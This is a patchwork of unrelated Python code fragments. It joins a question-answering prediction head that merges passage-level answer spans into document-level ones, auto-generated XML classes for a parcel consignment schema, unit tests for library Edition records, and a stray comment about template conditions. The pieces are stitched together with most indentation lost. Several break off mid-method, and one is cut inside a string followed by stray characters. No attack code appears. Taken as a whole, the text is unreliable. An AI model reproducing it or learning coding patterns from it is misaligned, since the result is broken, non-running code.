preds_final.append(preds)
return preds_final
def formatted_preds(self,
preds: List[QACandidate],
baskets: List[SampleBasket],
logits: Optional[paddle.Tensor]=None,
**kwargs):
"""
Takes a list of passage level predictions, each corresponding to one sample, and converts them into document level
predictions. Leverages information in the SampleBaskets. Assumes that we are being passed predictions from
ALL samples in the one SampleBasket i.e. all passages of a document. Logits should be None, because we have
already converted the logits to predictions before calling formatted_preds.
(see Inferencer._get_predictions_and_aggregate()).
"""
# Unpack some useful variables
# passage_start_t is the token index of the passage relative to the document (usually a multiple of doc_stride)
# seq_2_start_t is the token index of the first token in passage relative to the input sequence (i.e. number of
# special tokens and question tokens that come before the passage tokens)
        if logits is not None or preds is None:
logger.error(
"QuestionAnsweringHead.formatted_preds() expects preds as input and logits to be None \
but was passed something different")
samples = [s for b in baskets for s in b.samples] # type: ignore
ids = [s.id for s in samples]
passage_start_t = [s.features[0]["passage_start_t"]
for s in samples] # type: ignore
seq_2_start_t = [s.features[0]["seq_2_start_t"]
for s in samples] # type: ignore
# Aggregate passage level predictions to create document level predictions.
# This method assumes that all passages of each document are contained in preds
# i.e. that there are no incomplete documents. The output of this step
# are prediction spans
preds_d = self.aggregate_preds(preds, passage_start_t, ids,
seq_2_start_t)
# Separate top_preds list from the no_ans_gap float.
top_preds, no_ans_gaps = zip(*preds_d)
# Takes document level prediction spans and returns string predictions
doc_preds = self.to_qa_preds(top_preds, no_ans_gaps, baskets)
return doc_preds
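    # A hedged sketch of how this method is typically called (the Inferencer that
    # collects preds/baskets is assumed and not shown here; names follow this class):
    #
    #   preds_per_sample = [[QACandidate(...), ...], ...]   # one list per passage/Sample
    #   doc_preds = head.formatted_preds(preds=preds_per_sample, baskets=baskets, logits=None)
    #   doc_preds[0].prediction                              # document-level QACandidates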
def to_qa_preds(self, top_preds, no_ans_gaps, baskets):
"""
Groups Span objects together in a QAPred object
"""
ret = []
# Iterate over each set of document level prediction
for pred_d, no_ans_gap, basket in zip(top_preds, no_ans_gaps, baskets):
# Unpack document offsets, clear text and id
token_offsets = basket.raw["document_offsets"]
pred_id = basket.id_external if basket.id_external else basket.id_internal
# These options reflect the different input dicts that can be assigned to the basket
# before any kind of normalization or preprocessing can happen
question_names = ["question_text", "qas", "questions"]
doc_names = ["document_text", "context", "text"]
document_text = try_get(doc_names, basket.raw)
question = self.get_question(question_names, basket.raw)
ground_truth = self.get_ground_truth(basket)
curr_doc_pred = QAPred(
id=pred_id,
prediction=pred_d,
context=document_text,
question=question,
token_offsets=token_offsets,
context_window_size=self.context_window_size,
aggregation_level="document",
ground_truth_answer=ground_truth,
no_answer_gap=no_ans_gap, )
ret.append(curr_doc_pred)
return ret
def aggregate_preds(self,
preds,
passage_start_t,
ids,
seq_2_start_t=None,
labels=None):
"""
Aggregate passage level predictions to create document level predictions.
This method assumes that all passages of each document are contained in preds
i.e. that there are no incomplete documents. The output of this step
are prediction spans. No answer is represented by a (-1, -1) span on the document level
"""
# Initialize some variables
n_samples = len(preds)
all_basket_preds = {}
all_basket_labels = {}
# Iterate over the preds of each sample - remove final number which is the sample id and not needed for aggregation
for sample_idx in range(n_samples):
basket_id = ids[sample_idx]
basket_id = basket_id.split("-")[:-1]
basket_id = "-".join(basket_id)
# curr_passage_start_t is the token offset of the current passage
# It will always be a multiple of doc_stride
curr_passage_start_t = passage_start_t[sample_idx]
# This is to account for the fact that all model input sequences start with some special tokens
# and also the question tokens before passage tokens.
if seq_2_start_t:
cur_seq_2_start_t = seq_2_start_t[sample_idx]
curr_passage_start_t -= cur_seq_2_start_t
# Converts the passage level predictions+labels to document level predictions+labels. Note
# that on the passage level a no answer is (0,0) but at document level it is (-1,-1) since (0,0)
# would refer to the first token of the document
# pred1, pred2 = preds[sample_idx]
pred_d = self.pred_to_doc_idxs(preds[sample_idx],
curr_passage_start_t, sample_idx)
if labels:
label_d = self.label_to_doc_idxs(labels[sample_idx],
curr_passage_start_t)
# Initialize the basket_id as a key in the all_basket_preds and all_basket_labels dictionaries
if basket_id not in all_basket_preds:
all_basket_preds[basket_id] = []
all_basket_labels[basket_id] = []
# Add predictions and labels to dictionary grouped by their basket_ids
# passage-level -> document-level
all_basket_preds[basket_id].append(pred_d)
if labels:
all_basket_labels[basket_id].append(label_d)
        # Pick n-best predictions and remove repeated labels
        all_basket_preds = {
            k: self.reduce_preds(v)
            for k, v in all_basket_preds.items()
        }
if labels:
all_basket_labels = {
k: self.reduce_labels(v)
for k, v in all_basket_labels.items()
}
# Return aggregated predictions in order as a list of lists
keys = [k for k in all_basket_preds]
aggregated_preds = [all_basket_preds[k] for k in keys]
if labels:
labels = [all_basket_labels[k] for k in keys]
return aggregated_preds, labels
else:
return aggregated_preds
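    # Hedged illustration of the grouping above: sample ids such as "7-0-0" and
    # "7-0-1" (two passages of the same document) both reduce to basket_id "7-0",
    # so their passage-level predictions land in the same all_basket_preds entry.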
@staticmethod
def pred_to_doc_idxs(pred, passage_start_t, sample_idx):
"""
Converts the passage level predictions to document level predictions. Note that on the doc level we
don't have special tokens or question tokens. This means that a no answer
        cannot be represented by a (0,0) qa_answer but will instead be represented by (-1, -1)
"""
new_pred = []
for qa_answer in pred:
start = qa_answer.offset_answer_start
end = qa_answer.offset_answer_end
if start == 0:
start = -1
else:
start += passage_start_t
if start < 0:
logger.error("Start token index < 0 (document level)")
if end == 0:
end = -1
else:
end += passage_start_t
if end < 0:
logger.error("End token index < 0 (document level)")
qa_answer.to_doc_level(start, end)
new_pred.append(qa_answer)
return new_pred
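    # Worked example (hedged; indices are illustrative): with passage_start_t=120
    # (question/special tokens already subtracted), a passage-level span (3, 7)
    # becomes the document-level span (123, 127), while a passage-level
    # no-answer (0, 0) becomes the document-level no-answer (-1, -1).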
def reduce_preds(self, preds):
"""
This function contains the logic for choosing the best answers from each passage. In the end, it
returns the n_best predictions on the document level.
"""
# Initialize variables
passage_no_answer = []
passage_best_score = []
passage_best_confidence = []
no_answer_scores = []
no_answer_confidences = []
n_samples = len(preds)
# Iterate over the top predictions for each sample
# Note: preds: [[QACandidate, QACandidate]]
for sample_idx, sample_preds in enumerate(preds):
best_pred = sample_preds[0]
best_pred_score = best_pred.score
best_pred_confidence = best_pred.confidence
no_answer_score, no_answer_confidence = self.get_no_answer_score_and_confidence(
sample_preds)
no_answer_score += self.no_ans_boost
# TODO we might want to apply some kind of a no_ans_boost to no_answer_confidence too
class MixedContainer(object):
    # Constants for category:
    CategoryNone = 0
    CategoryText = 1
    CategorySimple = 2
    CategoryComplex = 3
    # Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace,
pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(
outfile, level, namespace, name_=name,
pretty_print=pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name,
base64.b64encode(self.value),
self.name))
def to_etree(self, element, mapping_=None, nsmap_=None):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(
element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self, mapping_=None, nsmap_=None):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
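# A hedged illustration of what MixedContainer.exportSimple writes for a simple
# integer member named "count" with value 3 (outfile is any file-like object):
#
#   <count>3</count>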
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0,
optional=0, child_attrs=None, choice=None):
self.name = name
self.data_type = data_type
self.container = container
self.child_attrs = child_attrs
self.choice = choice
self.optional = optional
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def set_child_attrs(self, child_attrs): self.child_attrs = child_attrs
def get_child_attrs(self): return self.child_attrs
def set_choice(self, choice): self.choice = choice
def get_choice(self): return self.choice
def set_optional(self, optional): self.optional = optional
def get_optional(self): return self.optional
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class booleanEnum(str, Enum):
N='N'
Y='Y'
class cashTypeEnum(str, Enum):
_0='0'
_1='1'
class productTypeEnum(str, Enum):
N='N'
D='D'
class senderReceiverEnum(str, Enum):
S='S'
R='R'
class consignmentIdentityType(GeneratedsSuper):
"""This element contains a consignment number and optional customer
reference.
These values are used to distinguish a consignment from any other
consignment.
This value appears on a routing label and is used as the key for a
consignment."""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, consignmentNumber=None, customerReference=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.consignmentNumber = consignmentNumber
self.consignmentNumber_nsprefix_ = None
self.customerReference = customerReference
self.customerReference_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, consignmentIdentityType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if consignmentIdentityType.subclass:
return consignmentIdentityType.subclass(*args_, **kwargs_)
else:
return consignmentIdentityType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_consignmentNumber(self):
return self.consignmentNumber
def set_consignmentNumber(self, consignmentNumber):
self.consignmentNumber = consignmentNumber
def get_customerReference(self):
return self.customerReference
def set_customerReference(self, customerReference):
self.customerReference = customerReference
def hasContent_(self):
if (
self.consignmentNumber is not None or
self.customerReference is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='consignmentIdentityType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('consignmentIdentityType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'consignmentIdentityType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='consignmentIdentityType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='consignmentIdentityType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='consignmentIdentityType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='consignmentIdentityType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.consignmentNumber is not None:
namespaceprefix_ = self.consignmentNumber_nsprefix_ + ':' if (UseCapturedNS_ and self.consignmentNumber_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sconsignmentNumber>%s</%sconsignmentNumber>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.consignmentNumber), input_name='consignmentNumber')), namespaceprefix_ , eol_))
if self.customerReference is not None:
namespaceprefix_ = self.customerReference_nsprefix_ + ':' if (UseCapturedNS_ and self.customerReference_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%scustomerReference>%s</%scustomerReference>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.customerReference), input_name='customerReference')), namespaceprefix_ , eol_))
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'consignmentNumber':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'consignmentNumber')
value_ = self.gds_validate_string(value_, node, 'consignmentNumber')
self.consignmentNumber = value_
self.consignmentNumber_nsprefix_ = child_.prefix
elif nodeName_ == 'customerReference':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'customerReference')
value_ = self.gds_validate_string(value_, node, 'customerReference')
self.customerReference = value_
self.customerReference_nsprefix_ = child_.prefix
# end class consignmentIdentityType
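# A hedged usage sketch (not part of the generated schema classes): build a
# consignment identity in code and serialise it with the export API shown above.
# The consignment number and customer reference values are illustrative only.
#
#   import sys
#   ident = consignmentIdentityType(consignmentNumber="GB123456785",
#                                   customerReference="PO-0001")
#   ident.export(sys.stdout, level=0, name_='consignmentIdentity')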
class nameAndAddressRequestType(GeneratedsSuper):
"""Information relating to name and address for a participant
in the consignment.
Examples of a participant are:
The Sender - the company sending the consignment
The Receiver - the company receiving the consignment
The Collection Address - the address from which the consignment is picked
up
The Delivery Address - the address to which the consignment should be
delivered"""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, name=None, addressLine1=None, addressLine2=None, addressLine3=None, town=None, exactMatch='Y', province=None, postcode=None, country=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.name = name
self.validate_stringMaxLength40(self.name)
self.name_nsprefix_ = None
self.addressLine1 = addressLine1
self.validate_stringMaxLength30(self.addressLine1)
self.addressLine1_nsprefix_ = None
self.addressLine2 = addressLine2
self.validate_stringMaxLength30(self.addressLine2)
self.addressLine2_nsprefix_ = None
self.addressLine3 = addressLine3
self.validate_stringMaxLength30(self.addressLine3)
self.addressLine3_nsprefix_ = None
self.town = town
self.validate_stringMaxLength40(self.town)
self.town_nsprefix_ = None
self.exactMatch = exactMatch
self.validate_booleanEnum(self.exactMatch)
self.exactMatch_nsprefix_ = None
self.province = province
self.validate_stringMaxLength30(self.province)
self.province_nsprefix_ = None
self.postcode = postcode
self.validate_stringMaxLength9(self.postcode)
self.postcode_nsprefix_ = None
self.country = country
self.validate_stringMinLength2MaxLength2(self.country)
self.country_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, nameAndAddressRequestType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if nameAndAddressRequestType.subclass:
return nameAndAddressRequestType.subclass(*args_, **kwargs_)
else:
return nameAndAddressRequestType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_name(self):
return self.name
def set_name(self, name):
self.name = name
def get_addressLine1(self):
return self.addressLine1
def set_addressLine1(self, addressLine1):
self.addressLine1 = addressLine1
def get_addressLine2(self):
return self.addressLine2
def set_addressLine2(self, addressLine2):
self.addressLine2 = addressLine2
def get_addressLine3(self):
return self.addressLine3
def set_addressLine3(self, addressLine3):
self.addressLine3 = addressLine3
def get_town(self):
return self.town
def set_town(self, town):
self.town = town
def get_exactMatch(self):
return self.exactMatch
def set_exactMatch(self, exactMatch):
self.exactMatch = exactMatch
def get_province(self):
return self.province
def set_province(self, province):
self.province = province
def get_postcode(self):
return self.postcode
def set_postcode(self, postcode):
self.postcode = postcode
def get_country(self):
return self.country
def set_country(self, country):
self.country = country
def validate_stringMaxLength40(self, value):
result = True
# Validate type stringMaxLength40, a restriction on xsd:string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
            if len(value) > 40:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxLength restriction on stringMaxLength40' % {"value": value, "lineno": lineno, })
                result = False
        return result
# encoding: utf-8
import datetime
from ...testing import DatabaseTest
from ...model import (
get_one_or_create,
PresentationCalculationPolicy,
)
from ...model.constants import MediaTypes
from ...model.coverage import CoverageRecord
from ...model.contributor import Contributor
from ...model.datasource import DataSource
from ...model.edition import Edition
from ...model.identifier import Identifier
from ...model.licensing import DeliveryMechanism
from ...model.resource import (
Hyperlink,
Representation,
)
class TestEdition(DatabaseTest):
def test_medium_from_media_type(self):
# Verify that we can guess a value for Edition.medium from a
# media type.
m = Edition.medium_from_media_type
for audio_type in MediaTypes.AUDIOBOOK_MEDIA_TYPES:
assert Edition.AUDIO_MEDIUM == m(audio_type)
assert Edition.AUDIO_MEDIUM == m(audio_type + ";param=value")
for book_type in MediaTypes.BOOK_MEDIA_TYPES:
assert Edition.BOOK_MEDIUM == m(book_type)
assert Edition.BOOK_MEDIUM == m(book_type + ";param=value")
assert Edition.BOOK_MEDIUM == m(DeliveryMechanism.ADOBE_DRM)
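    # Hedged usage sketch of the classmethod under test; the media type strings
    # below are examples assumed to appear in the corresponding MediaTypes lists:
    #
    #   Edition.medium_from_media_type("application/epub+zip")    # -> Edition.BOOK_MEDIUM
    #   Edition.medium_from_media_type("audio/mpeg;param=value")  # -> Edition.AUDIO_MEDIUM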
def test_license_pools(self):
# Here are two collections that provide access to the same book.
c1 = self._collection()
c2 = self._collection()
edition, lp1 = self._edition(with_license_pool=True)
lp2 = self._licensepool(edition=edition, collection=c2)
# Two LicensePools for the same work.
assert lp1.identifier == lp2.identifier
# Edition.license_pools contains both.
assert set([lp1, lp2]) == set(edition.license_pools)
def test_author_contributors(self):
data_source = DataSource.lookup(self._db, DataSource.GUTENBERG)
id = self._str
type = Identifier.GUTENBERG_ID
edition, was_new = Edition.for_foreign_id(
self._db, data_source, type, id
)
# We've listed the same person as primary author and author.
[alice], ignore = Contributor.lookup(self._db, "<NAME>")
edition.add_contributor(
alice, [Contributor.AUTHOR_ROLE, Contributor.PRIMARY_AUTHOR_ROLE]
)
# We've listed a different person as illustrator.
[bob], ignore = Contributor.lookup(self._db, "Bitshifter, Bob")
edition.add_contributor(bob, [Contributor.ILLUSTRATOR_ROLE])
# Both contributors show up in .contributors.
assert set([alice, bob]) == edition.contributors
# Only the author shows up in .author_contributors, and she
# only shows up once.
assert [alice] == edition.author_contributors
def test_for_foreign_id(self):
"""Verify we can get a data source's view of a foreign id."""
data_source = DataSource.lookup(self._db, DataSource.GUTENBERG)
id = "549"
type = Identifier.GUTENBERG_ID
record, was_new = Edition.for_foreign_id(
self._db, data_source, type, id)
assert data_source == record.data_source
identifier = record.primary_identifier
assert id == identifier.identifier
assert type == identifier.type
assert True == was_new
assert [identifier] == record.equivalent_identifiers()
# We can get the same work record by providing only the name
# of the data source.
record, was_new = Edition.for_foreign_id(
self._db, DataSource.GUTENBERG, type, id)
assert data_source == record.data_source
assert identifier == record.primary_identifier
assert False == was_new
def test_missing_coverage_from(self):
gutenberg = DataSource.lookup(self._db, DataSource.GUTENBERG)
oclc = DataSource.lookup(self._db, DataSource.OCLC)
web = DataSource.lookup(self._db, DataSource.WEB)
# Here are two Gutenberg records.
g1, ignore = Edition.for_foreign_id(
self._db, gutenberg, Identifier.GUTENBERG_ID, "1")
g2, ignore = Edition.for_foreign_id(
self._db, gutenberg, Identifier.GUTENBERG_ID, "2")
# One of them has coverage from OCLC Classify
c1 = self._coverage_record(g1, oclc)
# The other has coverage from a specific operation on OCLC Classify
c2 = self._coverage_record(g2, oclc, "some operation")
# Here's a web record, just sitting there.
w, ignore = Edition.for_foreign_id(
self._db, web, Identifier.URI, "http://www.foo.com/")
# missing_coverage_from picks up the Gutenberg record with no
# coverage from OCLC. It doesn't pick up the other
# Gutenberg record, and it doesn't pick up the web record.
[in_gutenberg_but_not_in_oclc] = Edition.missing_coverage_from(
self._db, gutenberg, oclc).all()
assert g2 == in_gutenberg_but_not_in_oclc
# If we ask about a specific operation, we get the Gutenberg
# record that has coverage for that operation, but not the one
# that has generic OCLC coverage.
[has_generic_coverage_only] = Edition.missing_coverage_from(
self._db, gutenberg, oclc, "some operation").all()
assert g1 == has_generic_coverage_only
# We don't put web sites into OCLC, so this will pick up the
# web record (but not the Gutenberg record).
[in_web_but_not_in_oclc] = Edition.missing_coverage_from(
self._db, web, oclc).all()
assert w == in_web_but_not_in_oclc
# We don't use the web as a source of coverage, so this will
# return both Gutenberg records (but not the web record).
assert [g1.id, g2.id] == sorted([x.id for x in Edition.missing_coverage_from(
self._db, gutenberg, web)])
def test_sort_by_priority(self):
# Make editions created by the license source, the metadata
# wrangler, and library staff.
admin = self._edition(data_source_name=DataSource.LIBRARY_STAFF, with_license_pool=False)
od = self._edition(data_source_name=DataSource.OVERDRIVE, with_license_pool=False)
mw = self._edition(data_source_name=DataSource.METADATA_WRANGLER, with_license_pool=False)
# Create an invalid edition with no data source. (This shouldn't
# happen.)
no_data_source = self._edition(with_license_pool=False)
no_data_source.data_source = None
def ids(l):
return [x for x in l]
# The invalid edition is the lowest priority. The admin
# interface and metadata wrangler take precedence over any
# other data sources.
expect = [no_data_source, od, mw, admin]
actual = Edition.sort_by_priority(expect)
assert ids(expect) == ids(actual)
# If you specify which data source is associated with the
# license for the book, you will boost its priority above that
# of the metadata wrangler.
expect = [no_data_source, mw, od, admin]
actual = Edition.sort_by_priority(expect, od.data_source)
assert ids(expect) == ids(actual)
def test_equivalent_identifiers(self):
edition = self._edition()
identifier = self._identifier()
data_source = DataSource.lookup(self._db, DataSource.OCLC)
identifier.equivalent_to(data_source, edition.primary_identifier, 0.6)
policy = PresentationCalculationPolicy(
equivalent_identifier_threshold=0.5
)
assert (set([identifier, edition.primary_identifier]) ==
set(edition.equivalent_identifiers(policy=policy)))
policy.equivalent_identifier_threshold = 0.7
assert (set([edition.primary_identifier]) ==
set(edition.equivalent_identifiers(policy=policy)))
def test_recursive_edition_equivalence(self):
# Here's a Edition for a Project Gutenberg text.
gutenberg, gutenberg_pool = self._edition(
data_source_name=DataSource.GUTENBERG,
identifier_type=Identifier.GUTENBERG_ID,
identifier_id="1",
with_open_access_download=True,
title="Original Gutenberg text")
# Here's a Edition for an Open Library text.
open_library, open_library_pool = self._edition(
data_source_name=DataSource.OPEN_LIBRARY,
identifier_type=Identifier.OPEN_LIBRARY_ID,
identifier_id="W1111",
with_open_access_download=True,
title="Open Library record")
# We've learned from OCLC Classify that the Gutenberg text is
# equivalent to a certain OCLC Number. We've learned from OCLC
# Linked Data that the Open Library text is equivalent to the
# same OCLC Number.
oclc_classify = DataSource.lookup(self._db, DataSource.OCLC)
oclc_linked_data = DataSource.lookup(self._db, DataSource.OCLC_LINKED_DATA)
oclc_number, ignore = Identifier.for_foreign_id(
self._db, Identifier.OCLC_NUMBER, "22")
gutenberg.primary_identifier.equivalent_to(
oclc_classify, oclc_number, 1)
open_library.primary_identifier.equivalent_to(
oclc_linked_data, oclc_number, 1)
# Here's a Edition for a Recovering the Classics cover.
web_source = DataSource.lookup(self._db, DataSource.WEB)
recovering, ignore = Edition.for_foreign_id(
self._db, web_source, Identifier.URI,
"http://recoveringtheclassics.com/pride-and-prejudice.jpg")
recovering.title = "Recovering the Classics cover"
# We've manually associated that Edition's URI directly
# with the Project Gutenberg text.
manual = DataSource.lookup(self._db, DataSource.MANUAL)
gutenberg.primary_identifier.equivalent_to(
manual, recovering.primary_identifier, 1)
# Finally, here's a completely unrelated Edition, which
# will not be showing up.
gutenberg2, gutenberg2_pool = self._edition(
data_source_name=DataSource.GUTENBERG,
identifier_type=Identifier.GUTENBERG_ID,
identifier_id="2",
with_open_access_download=True,
title="Unrelated Gutenberg record.")
# When we call equivalent_editions on the Project Gutenberg
# Edition, we get three Editions: the Gutenberg record
# itself, the Open Library record, and the Recovering the
# Classics record.
#
# We get the Open Library record because it's associated with
# the same OCLC Number as the Gutenberg record. We get the
# Recovering the Classics record because it's associated
# directly with the Gutenberg record.
results = list(gutenberg.equivalent_editions())
assert 3 == len(results)
assert gutenberg in results
assert open_library in results
assert recovering in results
# Here's a Work that incorporates one of the Gutenberg records.
work = self._work()
work.license_pools.extend([gutenberg2_pool])
# Its set-of-all-editions contains only one record.
assert 1 == work.all_editions().count()
# If we add the other Gutenberg record to it, then its
# set-of-all-editions is extended by that record, *plus*
# all the Editions equivalent to that record.
work.license_pools.extend([gutenberg_pool])
assert 4 == work.all_editions().count()
def test_calculate_presentation_title(self):
wr = self._edition(title="The Foo")
wr.calculate_presentation()
assert "Foo, The" == wr.sort_title
wr = self._edition(title="A Foo")
wr.calculate_presentation()
assert "Foo, A" == wr.sort_title
def test_calculate_presentation_missing_author(self):
wr = self._edition()
self._db.delete(wr.contributions[0])
self._db.commit()
wr.calculate_presentation()
assert u"[Unknown]" == wr.sort_author
assert u"[Unknown]" == wr.author
def test_calculate_presentation_author(self):
bob, ignore = self._contributor(sort_name="Bitshifter, Bob")
wr = self._edition(authors=bob.sort_name)
wr.calculate_presentation()
assert "<NAME>" == wr.author
assert "Bitshifter, Bob" == wr.sort_author
bob.display_name="<NAME>"
wr.calculate_presentation()
assert "<NAME>. Bitshifter" == wr.author
assert "Bitshifter, Bob" == wr.sort_author
kelly, ignore = self._contributor(sort_name="Accumulator, Kelly")
wr.add_contributor(kelly, Contributor.AUTHOR_ROLE)
wr.calculate_presentation()
assert "Kelly Accumulator, <NAME>" == wr.author
assert "Accumulator, Kelly ; Bitshifter, Bob" == wr.sort_author
def test_set_summary(self):
e, pool = self._edition(with_license_pool=True)
work = self._work(presentation_edition=e)
overdrive = DataSource.lookup(self._db, DataSource.OVERDRIVE)
        # Set the work's summary.
l1, new = pool.add_link(Hyperlink.DESCRIPTION, None, overdrive, "text/plain",
"F")
work.set_summary(l1.resource)
assert l1.resource == work.summary
assert "F" == work.summary_text
# Remove the summary.
work.set_summary(None)
assert None == work.summary
assert "" == work.summary_text
def test_calculate_evaluate_summary_quality_with_privileged_data_sources(self):
e, pool = self._edition(with_license_pool=True)
oclc = DataSource.lookup(self._db, DataSource.OCLC_LINKED_DATA)
overdrive = DataSource.lookup(self._db, DataSource.OVERDRIVE)
# There's a perfunctory description from Overdrive.
l1, new = pool.add_link(Hyperlink.SHORT_DESCRIPTION, None, overdrive, "text/plain",
"F")
overdrive_resource = l1.resource
# There's a much better description from OCLC Linked Data.
l2, new = pool.add_link(Hyperlink.DESCRIPTION, None, oclc, "text/plain",
"""Nothing about working with his former high school crush, <NAME>, is ideal. Still, if <NAME> intends to save his grandmother's bakery, he must. Good thing he has a lot of ideas he can't wait to implement. He never imagines Stephanie would have her own ideas for | |
# the ELSE nodelist was the one which was rendered, whilst
# still collecting the individual conditions that made up all the if components
# to check which ones failed with a MissingVariable exception rather than just
# evaluating falsy...
conditions_seen = set() # type: Set[TemplateLiteral]
conditions = [] # type: List[TemplateLiteral]
